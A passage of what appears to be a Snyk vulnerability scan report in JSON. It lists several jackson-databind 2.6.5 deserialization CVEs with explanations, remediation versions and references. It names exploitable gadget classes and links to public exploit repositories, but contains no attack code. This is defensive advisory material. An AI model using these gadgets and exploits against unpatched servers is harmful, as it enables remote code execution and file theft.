components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "shortDescription": { + "text": "Medium severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-12814) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 5.9, + "security-severity": "5.9" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-12384) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14379) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n# References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-16335) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14540) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-16942) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-16943) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n# References\n- [GitHub 